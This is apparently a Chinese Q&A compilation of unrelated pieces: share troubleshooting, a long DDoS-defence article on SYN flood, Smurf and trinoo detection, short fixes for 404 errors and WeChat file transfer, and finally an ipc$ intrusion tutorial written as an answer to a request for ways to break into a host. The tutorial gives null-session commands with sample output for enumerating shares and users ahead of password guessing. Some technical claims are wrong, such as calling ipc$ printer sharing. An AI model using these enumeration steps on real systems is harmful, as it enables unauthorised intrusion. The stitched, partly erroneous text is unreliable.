轉移共享找不到網路路徑

1. 一台電腦運行一會後區域網內的其他電腦無法連接它是什麼原因

考慮一下防火牆的問題，有些殺毒軟體或防火牆會自動關閉共享或共享盤符，比如c$ d$ e$ 分別是默認狀態下的共享盤符。你可以試一下在「開始菜單——運行」中輸入cmd打開命令提示符，輸入「netshare ipc$」或「netshare d$」再試一下。ipc$表示列印機共享，d$表示D盤共享

另外也有可能是受到攻擊了

拒絕服務攻擊是一種遍布全球的系統漏洞，黑客們正醉心於對它的研究，而無數的網路用戶將成為這種攻擊的受害者。Tribe Flood Network, tfn2k, smurf, targa…還有許多的程序都在被不斷的開發出來。這些程序想瘟疫一樣在網路中散布開來，使得我們的村落更為薄弱，我們不得不找出一套簡單易用的安全解決方案來應付黑暗中的攻擊。
由於我們防範手段的加強，拒絕服務攻擊手法也在不斷的發展。 Tribe Flood Network (tfn) 和tfn2k引入了一個新概念：分布式。這些程序可以使得分散在互連網各處的機器共同完成對一台主機攻擊的操作，從而使主機看起來好象是遭到了不同位置的許多主機的攻擊。這些分散的機器由幾台主控制機操作進行多種類型的攻擊，如UDP flood, SYN flood等。

操作系統和網路設備的缺陷在不斷地被發現並被黑客所利用來進行惡意的攻擊。如果我們清楚的認識到了這一點，我們應當使用下面的兩步來盡量阻止網路攻擊保護我們的網路: 盡可能的修正已經發現的問題和系統漏洞。
識別，跟蹤或禁止這些令人討厭的機器或網路對我們的訪問。
我們先來關注第二點我們面臨的主要問題是如何識別那些惡意攻擊的主機，特別是使用拒絕服務攻擊的機器。因為這些機器隱藏了他們自己的地址，而冒用被攻擊者的地址。攻擊者使用了數以千記的惡意偽造包來使我們的主機受到攻擊。"tfn2k"的原理就象上面講的這么簡單，而他只不過又提供了一個形象的界面。假如您遭到了分布式的拒絕服務攻擊，實在是很難處理。

有一些簡單的手法來防止拒絕服務式的攻擊。最為常用的一種當然是時刻關注安全信息以期待最好的方法出現。管理員應當訂閱安全信息報告，實時的關注所有安全問題的發展。：） 第二步是應用包過濾的技術，主要是過濾對外開放的埠。這些手段主要是防止假冒地址的攻擊，使得外部機器無法假冒內部機器的地址來對內部機器發動攻擊。

對於應該使用向內的包過濾還是使用向外的包過濾一直存在著爭論。RFC 2267建議在全球范圍的互連網上使用向內過濾的機制，但是這樣會帶來很多的麻煩，在中等級別的路由器上使用訪問控制列表不會帶來太大的麻煩，但是已經滿載的骨幹路由器上會受到明顯的威脅。另一方面，ISP如果使用向外的包過濾措施會把過載的流量轉移到一些不太忙的設備上。 ISP也不關心消費者是否在他們的邊界路由器上使用這種技術。當然，這種過濾技術也並不是萬無一失的，這依賴於管理人員採用的過濾機制。

1．ICMP防護措施

ICMP最初開發出來是為了"幫助"網路，經常被廣域網管理員用作診斷工具。但今天各種各樣的不充分的ICMP被濫用，沒有遵守RFC 792原先制訂的標准，要執行一定的策略可以讓它變得安全一些。

入站的ICMP時間標記（Timestamp）和信息請求(Information Request)數據包會得到響應，帶有非法或壞參數的偽造數據包也能產生ICMP參數問題數據包，從而允許另外一種形式的主機搜尋。這仍使得站點沒有得到適當保護。

以秘密形式從主方到客戶方發布命令的一種通用方法，就是使用ICMP Echo應答數據包作為載波。 回聲應答本身不能回答，一般不會被防火牆阻塞。

首先，我們必須根據出站和入站處理整個的"ICMP限制"問題。ICMP回聲很容易驗證遠程機器，但出站的ICMP回聲應該被限制只支持個人或單個伺服器/ICMP代理（首選）。

如果我們限制ICMP回聲到一個外部IP地址（通過代理），則我們的ICMP回聲應答只能進入我們網路中預先定義的主機。

重定向通常可以在路由器之間找到，而不是在主機之間。防火牆規則應該加以調整，使得這些類型的ICMP只被允許在需要信息的網際連接所涉及的路由器之間進行。

建議所有對外的傳輸都經過代理，對內的ICMP傳輸回到代理地址的時候要經過防火牆。這至少限制了ICMP超時數據包進入一個內部地址，但它可能阻塞超時數據包。

當ICMP數據包以不正確的參數發送時，會導致數據包被丟棄，這時就會發出ICMP參數出錯數據包。主機或路由器丟棄發送的數據包，並向發送者回送參數ICMP出錯數據包，指出壞的參數。

總的來說，只有公開地址的伺服器（比如Web、電子郵件和FTP伺服器）、防火牆、聯入網際網路的路由器有真正的理由使用ICMP與外面的世界對話。如果調整適當，實際上所有使用進站和出站ICMP的隱密通訊通道都會被中止。

2. SYN Flood防範

SYN Flood是當前最流行的DoS（拒絕服務攻擊）與DdoS（分布式拒絕服務攻擊）的方式之一，這是一種利用TCP協議缺陷，發送大量偽造的TCP連接請求，從而使得被攻擊方資源耗盡（CPU滿負荷或內存不足）的攻擊方式。對於SYN Flood攻擊，目前尚沒有很好的監測和防禦方法，不過如果系統管理員熟悉攻擊方法和系統架構，通過一系列的設定，也能從一定程度上降低被攻擊系統的負荷，減輕負面的影響。

一般來說，如果一個系統（或主機）負荷突然升高甚至失去響應，使用Netstat 命令能看到大量SYN_RCVD的半連接（數量>500或占總連接數的10%以上），可以認定，這個系統（或主機）遭到了SYN Flood攻擊。遭到SYN Flood攻擊後，首先要做的是取證，通過Netstat –n –p tcp >resault.txt記錄目前所有TCP連接狀態是必要的，如果有嗅探器，或者TcpDump之類的工具，記錄TCP SYN報文的所有細節也有助於以後追查和防禦，需要記錄的欄位有：源地址、IP首部中的標識、TCP首部中的序列號、TTL值等，這些信息雖然很可能是攻擊者偽造的，但是用來分析攻擊者的心理狀態和攻擊程序也不無幫助。特別是TTL值，如果大量的攻擊包似乎來自不同的IP但是TTL值卻相同，我們往往能推斷出攻擊者與我們之間的路由器距離，至少也可以通過過濾特定TTL值的報文降低被攻擊系統的負荷（在這種情況下TTL值與攻擊報文不同的用戶就可以恢復正常訪問）。從防禦角度來說，有幾種簡單的解決方法：

2.1縮短SYN Timeout時間:由於SYN Flood攻擊的效果取決於伺服器上保持的SYN半連接數，這個值=SYN攻擊的頻度 x SYN Timeout，所以通過縮短從接收到SYN報文到確定這個報文無效並丟棄改連接的時間，例如設置為20秒以下（過低的SYN Timeout設置可能會影響客戶的正常訪問），可以成倍的降低伺服器的負荷。

2.2設置SYN Cookie:就是給每一個請求連接的IP地址分配一個Cookie，如果短時間內連續受到某個IP的重復SYN報文，就認定是受到了攻擊，以後從這個IP地址來的包會被丟棄。可是上述的兩種方法只能對付比較原始的SYN Flood攻擊，縮短SYN Timeout時間僅在對方攻擊頻度不高的情況下生效，SYN Cookie更依賴於對方使用真實的IP地址，如果攻擊者以數萬/秒的速度發送SYN報文，同時利用SOCK_RAW隨機改寫IP報文中的源地址，以上的方法將毫無用武之地。

2.3負反饋策略:參考一些流行的操作系統，如Windows2000的SYN攻擊保護機制：正常情況下，OS對TCP連接的一些重要參數有一個常規的設置： SYN Timeout時間、SYN-ACK的重試次數、SYN報文從路由器到系統再到Winsock的延時等等。這個常規設置針對系統優化，可以給用戶提供方便快捷的服務；一旦伺服器受到攻擊，SYN Half link 的數量超過系統中TCP活動 Half Connction最大連接數的設置，系統將會認為自己受到了SYN Flood攻擊，並將根據攻擊的判斷情況作出反應：減短SYN Timeout時間、減少SYN-ACK的重試次數、自動對緩沖區中的報文進行延時等等措施，力圖將攻擊危害減到最低。如果攻擊繼續，超過了系統允許的最大Half Connection 值，系統已經不能提供正常的服務了，為了保證系統不崩潰，可以將任何超出最大Half Connection 值范圍的SYN報文隨機丟棄，保證系統的穩定性。

所以，可以事先測試或者預測該主機在峰值時期的Half Connction 的活動數量上限，以其作為參考設定TCP活動 Half Connction最大連接數的值，然後再以該值的倍數（不要超過2）作為TCP最大Half Connection值，這樣可以通過負反饋的手段在一定程度上阻止SYN攻擊。

2.4退讓策略:退讓策略是基於SYN Flood攻擊代碼的一個缺陷，我們重新來分析一下SYN Flood攻擊者的流程：SYN Flood程序有兩種攻擊方式，基於IP的和基於域名的，前者是攻擊者自己進行域名解析並將IP地址傳遞給攻擊程序，後者是攻擊程序自動進行域名解析，但是它們有一點是相同的，就是一旦攻擊開始，將不會再進行域名解析，我們的切入點正是這里：假設一台伺服器在受到SYN Flood攻擊後迅速更換自己的IP地址，那麼攻擊者仍在不斷攻擊的只是一個空的IP地址，並沒有任何主機，而防禦方只要將DNS解析更改到新的IP地址就能在很短的時間內（取決於DNS的刷新時間）恢復用戶通過域名進行的正常訪問。為了迷惑攻擊者，我們甚至可以放置一台「犧牲」伺服器讓攻擊者滿足於攻擊的「效果」（由於DNS緩沖的原因，只要攻擊者的瀏覽器不重起，他訪問的仍然是原先的IP地址）。

2.5分布式DNS負載均衡:在眾多的負載均衡架構中，基於DNS解析的負載均衡本身就擁有對SYN Flood的免疫力，基於DNS解析的負載均衡能將用戶的請求分配到不同IP的伺服器主機上，攻擊者攻擊的永遠只是其中一台伺服器，一來這樣增加了攻擊者的成本，二來過多的DNS請求可以幫助我們追查攻擊者的真正蹤跡（DNS請求不同於SYN攻擊，是需要返回數據的，所以很難進行IP偽裝）。

2.6防火牆Qos:對於防火牆來說，防禦SYN Flood攻擊的方法取決於防火牆工作的基本原理，一般說來，防火牆可以工作在TCP層之上或IP層之下，工作在TCP層之上的防火牆稱為網關型防火牆，網關型防火牆布局中，客戶機與伺服器之間並沒有真正的TCP連接，客戶機與伺服器之間的所有數據交換都是通過防火牆代理的，外部的DNS解析也同樣指向防火牆，所以如果網站被攻擊，真正受到攻擊的是防火牆，這種防火牆的優點是穩定性好，抗打擊能力強，但是因為所有的TCP報文都需要經過防火牆轉發，所以效率比較低由於客戶機並不直接與伺服器建立連接，在TCP連接沒有完成時防火牆不會去向後台的伺服器建立新的TCP連接，所以攻擊者無法越過防火牆直接攻擊後台伺服器，只要防火牆本身做的足夠強壯，這種架構可以抵抗相當強度的SYN Flood攻擊。但是由於防火牆實際建立的TCP連接數為用戶連接數的兩倍（防火牆兩端都需要建立TCP連接），同時又代理了所有的來自客戶端的TCP請求和數據傳送，在系統訪問量較大時，防火牆自身的負荷會比較高，所以這種架構並不能適用於大型網站。（我感覺，對於這樣的防火牆架構，使用TCP_STATE攻擊估計會相當有效:）

工作在IP層或IP層之下的稱為路由型防火牆，其工作原理有所不同：客戶機直接與伺服器進行TCP連接，防火牆起的是路由器的作用，它截獲所有通過的包並進行過濾，通過過濾的包被轉發給伺服器，外部的DNS解析也直接指向伺服器，這種防火牆的優點是效率高，可以適應100Mbps-1Gbps的流量，但是這種防火牆如果配置不當，不僅可以讓攻擊者越過防火牆直接攻擊內部伺服器，甚至有可能放大攻擊的強度，導致整個系統崩潰。

在這兩種基本模型之外，有一種新的防火牆模型，它集中了兩種防火牆的優勢，這種防火牆的工作原理如下所示：

第一階段，客戶機請求與防火牆建立連接：
第二階段，防火牆偽裝成客戶機與後台的伺服器建立連接
第三階段，之後所有從客戶機來的TCP報文防火牆都直接轉發給後台的伺服器
這種結構吸取了上兩種防火牆的優點，既能完全控制所有的SYN報文，又不需要對所有的TCP數據報文進行代理，是一種兩全其美的方法。近來，國外和國內的一些防火牆廠商開始研究帶寬控制技術，如果能真正做到嚴格控制、分配帶寬，就能很大程度上防禦絕大多數的SYN攻擊。

3.Smurf防範的幾種方法

阻塞Smurf攻擊的源頭:Smurf攻擊依靠攻擊者的力量使用欺騙性源地址發送echo請求。用戶可以使用路由路的訪問保證內部網路中發出的所有傳輸信息都具有合法的源地址，以防止這種攻擊。這樣可以使欺騙性分組無法找到反彈站點。

阻塞Smurf的反彈站點:用戶可以有兩種選擇以阻塞Smurf攻擊的反彈站點。第一種方法可以簡單地阻塞所有入站echo請求，這們可以防止這些分組到達自己的網路。如果不能阻塞所有入站echo請求，用戶就需要讓自己的路由器把網路廣播地址映射成為LAN廣播地址。制止了這個映射過程，自己的系統就不會再收到這些echo請求。

阻止Smurf平台:為防止系統成為 smurf攻擊的平台，要將所有路由器上IP的廣播功能都禁止。一般來講，IP廣播功能並不需要。 如果攻擊者要成功地利用你成為攻擊平台，你的路由器必須要允許信息包以不是從你的內網中產生的源地址離開網路。配置路由器，讓它將不是由你的內網中生成的信息包過濾出去，這是有可能做到的。這就是所謂的網路出口過濾器功能。

防止Smurf攻擊目標站點:除非用戶的ISP願意提供幫助，否則用戶自己很難防止Smurf對自己的WAN接連線路造成的影響。雖然用戶可以在自己的網路設備中阻塞這種傳輸，但對於防止Smurf吞噬所有的WAN帶寬已經太晚了。但至少用戶可以把Smurf的影響限制在外圍設備上。通過使用動態分組過濾技術，或者使用防火牆，用戶可以阻止這些分組進入自己的網路。防火牆的狀態表很清楚這些攻擊會話不是本地網路中發出的（狀態表記錄中沒有最初的echo請求記錄），因些它會象對待其它欺騙性攻擊行為那樣把這樣信息丟棄。

4.UDP Flood防範

以前文提到的trinoo為例，分析如下：

在master程序與代理程序的所有通訊中，trinoo都使用了UDP協議。入侵檢測軟體能夠尋找使用UDP協議的數據流(類型17)。
Trinoo master程序的監聽埠是27655，攻擊者一般藉助telnet通過TCP連接到master程序所在計算機。入侵檢測軟體能夠搜索到使用TCP (類型6)並連接到埠27655的數據流。
所有從master程序到代理程序的通訊都包含字元串"l44"，並且被引導到代理的UDP 埠27444。入侵檢測軟體檢查到UDP 埠27444的連接，如果有包含字元串l44的信息包被發送過去，那麼接受這個信息包的計算機可能就是DDoS代理。
Master和代理之間通訊受到口令的保護，但是口令不是以加密格式發送的，因此它可以被「嗅探」到並被檢測出來。使用這個口令以及來自Dave Dittrich的trinot腳本http://staff.washington.e/dittrich/misc/trinoo.analysis，要准確地驗證出trinoo代理的存在是很可能的。
一旦一個代理被准確地識別出來，trinoo網路就可以安裝如下步驟被拆除：

在代理daemon上使用"strings"命令，將master的IP地址暴露出來。
與所有作為trinoo master的機器管理者聯系，通知它們這一事件。
在master計算機上，識別含有代理IP地址列表的文件(默認名"...")，得到這些計算機的IP地址列表。
向代理發送一個偽造"trinoo"命令來禁止代理。通過crontab 文件(在UNIX系統中)的一個條目，代理可以有規律地重新啟動， 因此，代理計算機需要一遍一遍地被關閉，直到代理系統的管理者修復了crontab文件為止。
檢查master程序的活動TCP連接，這能顯示攻擊者與trinoo master程序之間存在的實時連接。
如果網路正在遭受trinoo攻擊，那麼系統就會被UDP 信息包所淹沒。Trinoo從同一源地址向目標主機上的任意埠發送信息包。探測trinoo就是要找到多個UDP信息包，它們使用同一來源IP地址、同一目的IP地址、同一源埠，但是不同的目的埠。
在http://www.fbi.gov/nipc/trinoo.htm上有一個檢測和根除trinoo的自動程序。
5.使用DNS來跟蹤匿名攻擊

從一個網管的觀點來看，防範的目標並不是僅僅阻止拒絕服務攻擊，而是要追究到攻擊的發起原因及操作者。當網路中有人使用假冒了源地址的工具（如tfn2k）時，我們雖然沒有現成的工具來確認它的合法性，但我們可以通過使用DNS來對其進行分析：

假如攻擊者選定了目標www.ttttt.com，他必須首先發送一個DNS請求來解析這個域名，通常那些攻擊工具工具會自己執行這一步，調用gethostbyname()函數或者相應的應用程序介面，也就是說，在攻擊事件發生前的DNS請求會提供給我們一個相關列表，我們可以利用它來定位攻擊者。

使用現成工具或者手工讀取DNS請求日誌，來讀取DNS可疑的請求列表都是切實可行的，然而，它有三個主要的缺點：

攻擊者一般會以本地的DNS為出發點來對地址進行解析查詢，因此我們查到的DNS請求的發起者有可能不是攻擊者本身，而是他所請求的本地DNS伺服器。盡管這樣，如果攻擊者隱藏在一個擁有本地DNS的組織內，我們就可以把該組織作為查詢的起點。

攻擊者有可能已經知道攻擊目標的IP地址，或者通過其他手段（host, ping）知道了目標的IP地址，亦或是攻擊者在查詢到IP地址後很長一段時間才開始攻擊，這樣我們就無法從DNS請求的時間段上來判斷攻擊者（或他們的本地伺服器）。

DNS對不同的域名都有一個卻省的存活時間，因此攻擊者可以使用存儲在DNS緩存中的信息來解析域名。為了更好做出詳細的解析記錄，您可以把DNS卻省的TTL時間縮小，但這樣會導致DNS更多的去查詢所以會加重網路帶寬的使用。

6.主機防範

所有對網際網路提供公開服務的主機都應該加以限制。下面建議的策略可以保護暴露在網際網路上的主機。

將所有公開伺服器與DMZ隔離
提供的每種服務都應該有自己的伺服器。
如果使用Linux（建議這樣做），你就可以使用一個或幾個"緩沖溢出/堆棧執行"補丁或增強來防止絕大多數（如果不能全部）本地或遠程緩沖溢出，以避免這些溢出危及根的安全。強烈建議將Solar Designer的補丁包括在附加的安全特徵中。
使用SRP（Secure Remote Password 安全遠程口令）代替SSH。
限制只有內部地址才能訪問支持SRP的telnet和FTP守護程序，強調只有支持SRP的客戶端才可以與這些程序對話。如果你必須為公開訪問運行常規的FTP（比如匿名FTP），可以在另一個埠運行SRP FTP。
使用可信任的路徑。根用戶擁有的二進制執行程序應該放置的目錄的所有權應該是根，不能讓全部用戶或組都有寫許可權。如果有必要的話，為了強制這樣做，你可以改變內核。
使用內置防火牆功能。通過打開防火牆規則，可以經常利用內核狀態表。
使用一些防埠掃描措施。這可以使用Linux的後台程序功能或通過修改內核實現。
使用Tripwire 和相同作用的軟體來幫助發覺對重要文件的修改。
7.電子郵件炸彈防護

對於保護電子件的安全來說，了解一下電子郵件的發送過程是很有必要的。它的過程是這樣的，當有用戶將郵件寫好之後首先連接到郵件伺服器上，當郵件伺服器有響應時便會啟動郵件工具，調用路由（這里指的是郵件的路由）程序Sendmail進行郵件路由，根據郵件所附的接收地址中指定的接收主機，比如： [email protected]里的163.net，與位於主機163.net電子郵件後台守護程序建立25埠的TCP連接，建立後雙方按照SMTP協議進行交互第進，從而完成郵件的投遞工作，接收方電子郵件接收郵件後，再根據接收用戶名稱，放置在系統的郵件目錄里，如/usr/電子郵件目錄的semxa文件中。接收用戶同樣使用郵件工具獲取和閱讀這些已投遞的郵件。如果投遞失敗的話，這些郵件將重新返回到發送方。實際上電子郵件的發送過程要比這里所說的更為復雜些，在過程里將會涉及很多的配置文件。在現在的SMTP協議是一個基於文本的協議，理解和實現都相對比較簡單些，你可以使用telnet直接登陸到郵件伺服器的25埠（由LANA授權分配給SMTP協議）進行交互。

保護電子信箱郵件的信息安全最有效的辦法就是使用加密的簽名技術，像PGP來驗證郵件，通過驗證可以保護到信息是從正確的地方發來的，而且在傳送過程中不被修改。但是這就不是個人用戶所能達到的了，因為PGP比較復雜。

就電子郵件炸彈而言，保護還是可以做得很好的。因為它的復雜性不是很高，多的僅僅是垃圾郵件而已。你可以使用到http://semxa.kstar.com/hacking/echom201.zip E-mail Chomper（砍信機）來保護自己。但是目前就國內用戶而言，大多用戶所使用的都是免費的郵箱，像yeah.net、163.net、263.net等，即便是有人炸頂多也是留在郵件伺服器上了，危害基本上是沒有的。如果是用pop3接的話，可以用Outlook或Foxmail等pop的收信工具來接收的mail，大多用戶使用的是windows的Outlook Express，可以在「工具－收件箱助理」中設置過濾。對於各種利用電子郵件而傳播的Email蠕蟲病毒和對未知的Emai蠕蟲病毒你可以使用防電子郵件病毒軟體來防護。

另外，郵件系統管理員可以使用「黑名單」來過濾一些垃圾信件。對於不同的郵件系統，大都可以在網路上找到最新的黑名單程序或者列表。

8.使用ngrep工具來處理tfn2k攻擊

根據使用DNS來跟蹤tfn2k駐留程序的原理，現在已經出現了稱為ngrep的實用工具。經過修改的ngrep可以監聽大約五種類型的tfn2k拒絕服務攻擊(targa3, SYN flood, UDP flood, ICMP flood 和 smurf)，它還有一個循環使用的緩存用來記錄DNS和ICMP請求。如果ngrep發覺有攻擊行為的話，它會將其緩存中的內容列印出來並繼續記錄ICMP回應請求。假如攻擊者通過ping目標主機的手段來鉚定攻擊目標的話，在攻擊過程中或之後記錄ICMP的回應請求是一種捕獲粗心的攻擊者的方法。由於攻擊者還很可能使用其他的服務來核實其攻擊的效果（例如web），所以對其他的標准服務也應當有盡量詳細的日誌記錄。

還應當注意，ngrep採用的是監聽網路的手段，因此，ngrep無法在交換式的環境中使用。但是經過修改的ngrep可以不必和你的DNS在同一個網段中，但是他必須位於一個可以監聽到所有DNS請求的位置。經過修改的ngrep也不關心目標地址，您可以把它放置在DMZ網段，使它能夠檢查橫貫該網路的tfn2k攻擊。從理論上講，它也可以很好的檢測出對外的tfn2k攻擊。

在ICMP flood事件中，ICMP回應請求的報告中將不包括做為tfn2k flood一部分的ICMP包。Ngrep還可以報告檢測出來的除smurf之外的攻擊類型（TARGA, UDP, SYN, ICMP等）。混合式的攻擊在預設情況下表現為ICMP攻擊，除非你屏蔽了向內的ICMP回應請求，這樣它就表現為UDP或SYN攻擊。這些攻擊的結果都是基本類似的。

9.有關入侵檢測系統的建議

由於許多用來擊敗基於網路的入侵檢測系統的方法對絕大多數商業入侵檢測系統產品仍然是有效的，因此建議入侵檢測系統應該至少有能重組或發覺碎片的自定址數據包。下面是部分要注意的事項：

確信包括了現有的所有規則，包括一些針對分布式拒絕服務攻擊的新規則。
如果遵循了ICMP建議項，許多ICMP會被阻塞，入侵檢測系統觸發器存在許多機會。任何通常情況下要被阻塞的入站或出站的ICMP數據包可以被觸發。
"任何"被你用防火牆分離的網路傳輸都可能是一個潛在的IDS觸發器。
如果你的入侵檢測系統支持探測長時間周期的攻擊，確信沒有把允許通過防火牆的被信任主機排除在外。這也包括虛擬專用網。
如果你能訓練每個使用ping的用戶在ping主機時使用小數據包，就可能設置入侵檢測系統尋找超29位元組的Echo和Echo應答數據包。

2. 404 not found怎麼解決404頁面怎麼做

1、首先，我們要確認我們的計算機網路是否連接正確，當我們的網路出現問題時比如遇到DNS劫持等情況時，我們有可能會出現「ERROR 404--NOT FOUND」的網頁提示。解決DNS劫持的方法就是，我們需要將我們計算機的DNS伺服器地址進行重新設置。

3. 沒有網路，怎樣將微信上的文件轉移到計算機上

1，把微信收藏的東西轉到電腦方法，可以在電腦上找到微信我的收藏在手機上的存儲路徑。
2，然後將其直接拷貝的電腦上，路徑如下：
圖片：Tencent/Micromsg/camera裡面。
3，微信安裝在手機就在手機內存里找，安裝在卡上就在存儲卡的這個。
4，也可以使用微信網頁版等根據不同格式的文件可有多種方式轉移，直接下載。
5，也可以將文件發送到騰訊或新浪微博，發送到郵件，最簡單的就是用USB將手機和電腦連接。
6，將收藏文件下載到手機、電腦啟用無線WIFI，並登陸QQ（保證手機WIFI和電腦的WIFI是同一個）在我的好友分組上面有一欄，我的設備；先用電腦隨便給手機發個東西，手機有我的電腦，電腦和手機就可以互傳文件了。

4. 網路電話無法打開文件系統找不到指定的路徑

一般提示系統找不到指定路徑多半是原系統文件被刪除或者文件目錄被轉移。
可以用可執行文件名的查找。在電腦中全盤搜索這個名字，找到後可以雙擊執行，這個文件看是否可以運行，如果不能運行的話就要重新安裝這個軟體了。
要手動確認對應的可執行文件。另外，右鍵點快捷方式，選屬性，在常規里就有一項目標路徑，這就是該快捷方式對應的文件。一般都是exe文件。

5. 有開了23埠的主機 求入侵思路

這多是本人多年下來的經驗。

網上關於 ipc$ 入侵的文章可謂多如牛毛，攻擊步驟甚至已經成為了固化的模式，因此也沒人願意再把這已經成為定式的東西拿出來擺弄。不過話雖這樣說，我認為這些文章講解的並不詳細，一些內容甚至是錯誤的，以致對 ipc$ 的提問幾乎佔了各大安全論壇討論區的半壁江山，而且這些問題常常都是重復的，嚴重影響了論壇質量和學習效率，因此我總結了這篇文章，希望能把 ipc$ 這部分東西盡量說清楚。
注意：本文所討論的各種情況均默認發生在 win NT/2000 環境下， win98 將不在此次討論之列。
二 什麼是 ipc$
IPC$(Internet Process Connection) 是共享 " 命名管道 " 的資源，它是為了讓進程間通信而開放的命名管道，通過提供可信任的用戶名和口令，連接雙方可以建立安全的通道並以此通道進行加密數據的交換，從而實現對遠程計算機的訪問。 IPC$ 是 NT/2000 的一項新功能，它有一個特點，即在同一時間內，兩個 IP 之間只允許建立一個連接。 NT/2000 在提供了 ipc$ 功能的同時，在初次安裝系統時還打開了默認共享，即所有的邏輯共享 (c$,d$,e$ …… ) 和系統目錄 winnt 或 windows(admin$) 共享。所有的這些，微軟的初衷都是為了方便管理員的管理，但在有意無意中，導致了系統安全性的降低。
平時我們總能聽到有人在說 ipc$ 漏洞， ipc$ 漏洞，其實 ipc$ 並不是一個真正意義上的漏洞 , 我想之所以有人這么說，一定是指微軟自己安置的那個『後門'：空會話（ Null session ）。那麼什麼是空會話呢？
三 什麼是空會話
在介紹空會話之前，我們有必要了解一下一個安全會話是如何建立的。
在 Windows NT 4.0 中是使用挑戰響應協議與遠程機器建立一個會話的，建立成功的會話將成為一個安全隧道，建立雙方通過它互通信息，這個過程的大致順序如下：
1 ）會話請求者（客戶）向會話接收者（伺服器）傳送一個數據包，請求安全隧道的建立；
2 ）伺服器產生一個隨機的 64 位數（實現挑戰）傳送回客戶；
3 ）客戶取得這個由伺服器產生的 64 位數，用試圖建立會話的帳號的口令打亂它，將結果返回到伺服器（實現響應）；
4 ）伺服器接受響應後發送給本地安全驗證（ LSA ）， LSA 通過使用該用戶正確的口令來核實響應以便確認請求者身份。如果請求者的帳號是伺服器的本地帳號，核實本地發生；如果請求的帳號是一個域的帳號，響應傳送到域控制器去核實。當對挑戰的響應核實為正確後，一個訪問令牌產生，然後傳送給客戶。客戶使用這個訪問令牌連接到伺服器上的資源直到建議的會話被終止。
以上是一個安全會話建立的大致過程，那麼空會話又如何呢？
空會話是在沒有信任的情況下與伺服器建立的會話（即未提供用戶名與密碼），但根據 WIN2000 的訪問控制模型，空會話的建立同樣需要提供一個令牌，可是空會話在建立過程中並沒有經過用戶信息的認證，所以這個令牌中不包含用戶信息，因此，這個會話不能讓系統間發送加密信息，但這並不表示空會話的令牌中不包含安全標識符 SID （它標識了用戶和所屬組），對於一個空會話， LSA 提供的令牌的 SID 是 S- 1-5-7 ，這就是空會話的 SID ，用戶名是： ANONYMOUS LOGON （這個用戶名是可以在用戶列表中看到的，但是是不能在 SAM 資料庫中找到，屬於系統內置的帳號），這個訪問令牌包含下面偽裝的組：
Everyone
Network
在安全策略的限制下，這個空會話將被授權訪問到上面兩個組有權訪問到的一切信息。那麼建立空會話到底可以作什麼呢？

四 空會話可以做什麼

對於 NT ，在默認安全設置下，藉助空連接可以列舉目標主機上的用戶和共享，訪問 everyone 許可權的共享，訪問小部分注冊表等，並沒有什麼太大的利用價值；對 2000 作用更小，因為在 Windows 2000 和以後版本中默認只有管理員和備份操作員有權從網路訪問到注冊表，而且實現起來也不方便，需藉助工具。
從這些我們可以看到，這種非信任會話並沒有多大的用處，但從一次完整的 ipc$ 入侵來看，空會話是一個不可缺少的跳板，因為我們從它那裡可以得到戶列表，而大多數弱口令掃描工具就是利用這個用戶列表來進行口令猜解的，成功的導出用戶列表大大增加了猜解的成功率，僅從這一點，足以說明空會話所帶來的安全隱患，因此說空會話毫無用處的說法是不正確的。以下是空會話中能夠使用的一些具體命令：
1 首先，我們先建立一個空會話（當然，這需要目標開放 ipc$ ）
命令： net use \\ip\ipc$ "" /user:""
注意：上面的命令包括四個空格， net 與 use 中間有一個空格， use 後面一個，密碼左右各一個空格。
2 查看遠程主機的共享資源
命令： net view \\ip
解釋：前提是建立了空連接後，用此命令可以查看遠程主機的共享資源，如果它開了共享，可以得到如下面的結果，但此命令不能顯示默認共享。
在 \\*.*.*.* 的共享資源
資源共享名 類型 用途 注釋
-----------------------------------------------------------
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。
3 查看遠程主機的當前時間
命令： net time \\ip
解釋：用此命令可以得到一個遠程主機的當前時間。
4 得到遠程主機的 NetBIOS 用戶名列表（需要打開自己的 NBT ）
命令： nbtstat -A ip
用此命令可以得到一個遠程主機的 NetBIOS 用戶名列表，返回如下結果：
Node IpAddress: [*.*.*.*] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H < 1C > GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1B> UNIQUE Registered
OYAMANISHI-H <1E> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
INet~Services < 1C > GROUP Registered
IS~SERVER......<00> UNIQUE Registered
MAC Address = 00-50-8B -9A -2D-37
以上就是我們經常使用空會話做的事情，好像也能獲得不少東西喲，不過要注意一點：建立 IPC$ 連接的操作會在 Event Log 中留下記錄，不管你是否登錄成功。 好了，那麼下面我們就來看看 ipc$ 所使用的埠是什麼？
五 ipc$ 所使用的埠
首先我們來了解一些基礎知識：
1 SMB:(Server Message Block) Windows 協議族，用於文件列印共享的服務；
2 NBT:(NETBios Over TCP/IP) 使用 137 （ UDP ） 138 （ UDP ） 139 （ TCP ）埠實現基於 TCP/IP 協議的 NETBIOS 網路互聯。
3 在 WindowsNT 中 SMB 基於 NBT 實現，即使用 139 （ TCP ）埠；而在 Windows2000 中， SMB 除了基於 NBT 實現，還可以直接通過 445 埠實現。
有了這些基礎知識，我們就可以進一步來討論訪問網路共享對埠的選擇了：
對於 win2000 客戶端（發起端）來說：
1 如果在允許 NBT 的情況下連接伺服器時，客戶端會同時嘗試訪問 139 和 445 埠，如果 445 埠有響應，那麼就發送 RST 包給 139 埠斷開連接，用 455 埠進行會話，當 445 埠無響應時，才使用 139 埠，如果兩個埠都沒有響應，則會話失敗；
2 如果在禁止 NBT 的情況下連接伺服器時，那麼客戶端只會嘗試訪問 445 埠，如果 445 埠無響應，那麼會話失敗。
對於 win2000 伺服器端來說：
1 如果允許 NBT, 那麼 UDP 埠 137, 138, TCP 埠 139, 445 將開放（ LISTENING ）；
2 如果禁止 NBT ，那麼只有 445 埠開放。
我們建立的 ipc$ 會話對埠的選擇同樣遵守以上原則。顯而易見，如果遠程伺服器沒有監聽 139 或 445 埠， ipc$ 會話是無法建立的。
六 ipc 管道在 hack 攻擊中的意義
